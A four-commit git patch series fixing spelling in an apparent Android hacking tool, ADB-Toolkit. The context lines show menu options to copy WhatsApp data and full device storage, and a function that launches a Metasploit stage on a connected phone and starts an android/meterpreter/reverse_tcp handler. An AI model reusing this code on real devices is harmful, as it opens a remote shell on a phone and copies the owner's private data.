From 05fda7507f150cabf1fd6911dd7370a759ccc85c Mon Sep 17 00:00:00 2001 From: Joel Segaert <51003087+sierra-echo-golf@users.noreply.github.com> Date: Sun, 10 Oct 2021 00:25:35 -0400 Subject: [PATCH 1/4] Update opt16 --- modules/opt16 | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/opt16 b/modules/opt16 index 295c08d..c37fc5a 100644 --- a/modules/opt16 +++ b/modules/opt16 @@ -61,7 +61,7 @@ remote_shell () { dev_1_remo () { devvv=$(echo "$dev_1") - echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n" + echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n" ip_finder adb -s $dev_1 tcpip 5555 > /dev/null 2>&1 connect_msg=$(adb -s $dev_1 connect $dev_ip) > /dev/null 2>&1 @@ -79,7 +79,7 @@ dev_1_remo () { dev_2_remo () { devvv=$(echo "$dev_2") - echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n" + echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n" ip_finder adb -s $dev_2 tcpip 5555 > /dev/null 2>&1 connect_msg=$(adb -s $dev_2 connect $dev_ip) > /dev/null 2>&1 @@ -98,7 +98,7 @@ dev_2_remo () { dev_3_remo () { devvv=$(echo "$dev_3") - echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n" + echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n" ip_finder adb -s $dev_3 tcpip 5555 > /dev/null 2>&1 connect_msg=$(adb -s $dev_3 connect $dev_ip) > /dev/null 2>&1 From 4e0b5483487abdb24f2d55b7103d2083cf09ea64 Mon Sep 17 00:00:00 2001 From: Joel Segaert <51003087+sierra-echo-golf@users.noreply.github.com> Date: Sun, 10 Oct 2021 01:52:56 -0400 Subject: [PATCH 2/4] Update funtion.sh --- modules/funtion.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/funtion.sh b/modules/funtion.sh index 080460b..82965a9 100644 --- a/modules/funtion.sh +++ b/modules/funtion.sh @@ -65,7 +65,7 @@ echo -e "\e[1;93m21. \e[1;92mCOPY ALL WHATSAPP DATA" echo -e "\e[1;93m22. \e[1;92mCOPY ALL DEVICE STORAGE ( Takes time ) \e[1;93mA. \e[1;92mABOUT AUTHOUR " echo -e "\e[1;93m23. \e[1;92mCOPY A SPECIFIED FILE OR FOLDER \e[1;91mEXIT or press Ctrl+c\n" echo -e $revised -read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options +read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options } From 825e81655d2cdf737e2081bc9b4d2c0eac7b8975 Mon Sep 17 00:00:00 2001 From: Joel Segaert <51003087+sierra-echo-golf@users.noreply.github.com> Date: Sun, 10 Oct 2021 01:53:41 -0400 Subject: [PATCH 3/4] Update function2.sh --- modules/function2.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/function2.sh b/modules/function2.sh index 14316bb..e1b4574 100644 --- a/modules/function2.sh +++ b/modules/function2.sh @@ -41,7 +41,7 @@ option2_list () { echo -e "\n\e[1;93m5. \e[1;92mGO BACK TO ADB-Toolkit" echo -e "\e[1;92mEXIT or press Ctrl+c\n" echo -e $revised - read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options2 + read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options2 } From be609e5f198ef5702d539ae7c57cdf8153bb8ee2 Mon Sep 17 00:00:00 2001 From: Joel Segaert <51003087+sierra-echo-golf@users.noreply.github.com> Date: Sun, 10 Oct 2021 02:09:48 -0400 Subject: [PATCH 4/4] Update 2opt2 --- modules/2opt2 | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/2opt2 b/modules/2opt2 index a113db2..0c195d3 100644 --- a/modules/2opt2 +++ b/modules/2opt2 @@ -103,10 +103,10 @@ apk_install () { fi } -start_listner () { +start_listener () { adb -s $devv shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1 >/dev/null 2>&1 | echo -e "\e[1;93mLaunching the PAYLOAD.\e[0m"; echo -e "\n\e[1;92mDone\n" - echo -e "\e[1;92mStarting the MSF listner\n" + echo -e "\e[1;92mStarting the MSF listener\n" time=$(date +"%T") echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost1\nset LPORT $lport1\nexploit" > $PWD/metasploit/.exploit-$time.rc msfconsole -q -r $PWD/metasploit/.exploit-$time.rc @@ -131,11 +131,11 @@ dev_1_payload_create () { esac done while true; do - read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn + read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn case $yn in - [Yy]* ) start_listner; break;; + [Yy]* ) start_listener; break;; [Nn]* ) clear && bash modules/function2.sh;; - * ) start_listner; break;; + * ) start_listener; break;; esac done } @@ -157,11 +157,11 @@ dev_2_payload_create () { esac done while true; do - read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn + read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn case $yn in - [Yy]* ) start_listner; break;; + [Yy]* ) start_listener; break;; [Nn]* ) clear && bash modules/function2.sh;; - * ) start_listner; break;; + * ) start_listener; break;; esac done } @@ -183,11 +183,11 @@ dev_3_payload_create () { esac done while true; do - read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn + read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn case $yn in - [Yy]* ) start_listner; break;; + [Yy]* ) start_listener; break;; [Nn]* ) clear && bash modules/function2.sh;; - * ) start_listner; break;; + * ) start_listener; break;; esac done